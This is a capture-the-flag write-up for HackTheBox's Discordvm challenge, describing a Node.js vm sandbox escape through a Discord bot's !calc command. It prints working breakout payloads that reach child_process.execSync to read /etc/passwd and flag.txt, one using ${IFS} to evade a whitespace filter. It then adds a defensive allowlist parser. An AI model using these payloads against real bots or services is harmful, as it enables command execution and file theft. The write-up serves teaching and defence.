HackTheBox Business CTF 2021 - Discordvm (Misc)


Discordvm is a misc challenge from HackTheBox Business CTF 2021. The challenge is about breaking out of the Node.js vm module.

Click the challenge information.

Click the URL; it navigates to a Discord channel.

Let's send a message to discordvm.

When we execute a program with !calc, for example !calc 1+1, discordvm replies with the output 1+1=2. Let's analyze the source code:

const vm = require('vm');
const payload = '1+1';
console.log(vm.runInNewContext(payload));

Then we follow the instructions from NodeJS Red Team Cheat Sheet or Sandboxing NodeJS is hard, here is why.

vm module breakout (by pwnisher)

"use strict";
const vm = require("vm");
const xyz = vm.runInNewContext(`const process = this.constructor.constructor('return this.process')();
process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()`);
console.log(xyz);

We need this:

const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').execSync('cat /etc/passwd').toString()

We got an error.

Modify the payload so it contains no whitespace, like this:

process=this.constructor.constructor('return(this.process)')();process.mainModule.require('child_process').execSync('cat${IFS}flag.txt').toString()

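The breakout works because the bot hands user text to vm.runInNewContext, and the Node.js vm module is not a security mechanism. As an added example (not part of the original write-up or the challenge source), a !calc handler can parse arithmetic itself and reject everything else; the names tokenize and safeCalc are hypothetical.

```javascript
// Added example: allowlist parser for a !calc handler (hypothetical names).
function tokenize(input) {
  const re = /\s*(?:(\d+(?:\.\d+)?)|([-+*\/()]))/y; // numbers, + - * / ( ) only
  const tokens = [];
  while (re.lastIndex < input.length) {
    const m = re.exec(input);
    if (!m) throw new Error('rejected: character outside the allowlist');
    tokens.push(m[1] !== undefined ? Number(m[1]) : m[2]);
  }
  return tokens;
}

function safeCalc(input) {
  if (typeof input !== 'string' || input.length > 100) throw new Error('rejected: bad input');
  const tokens = tokenize(input.trim());
  let pos = 0;
  function primary() {                 // number | -primary | ( expr )
    const t = tokens[pos++];
    if (typeof t === 'number') return t;
    if (t === '-') return -primary();
    if (t === '(') {
      const v = expr();
      if (tokens[pos++] === ')') return v;
    }
    throw new Error('rejected: malformed expression');
  }
  function term() {                    // primary (('*' | '/') primary)*
    let v = primary();
    while (tokens[pos] === '*' || tokens[pos] === '/') {
      v = tokens[pos++] === '*' ? v * primary() : v / primary();
    }
    return v;
  }
  function expr() {                    // term (('+' | '-') term)*
    let v = term();
    while (tokens[pos] === '+' || tokens[pos] === '-') {
      v = tokens[pos++] === '+' ? v + term() : v - term();
    }
    return v;
  }
  const result = expr();
  if (pos !== tokens.length || !Number.isFinite(result)) throw new Error('rejected: invalid expression');
  return result;
}

// Constructed sample inputs: one benign, one using the page's breakout primitive.
for (const msg of ['1+1', "this.constructor.constructor('return this.process')()"]) {
  try { console.log(`${msg}=${safeCalc(msg)}`); } catch (e) { console.log(e.message); }
}
```

No user text is ever evaluated as JavaScript here, so identifiers such as this, constructor or process are rejected at the tokenizer before any expression is computed.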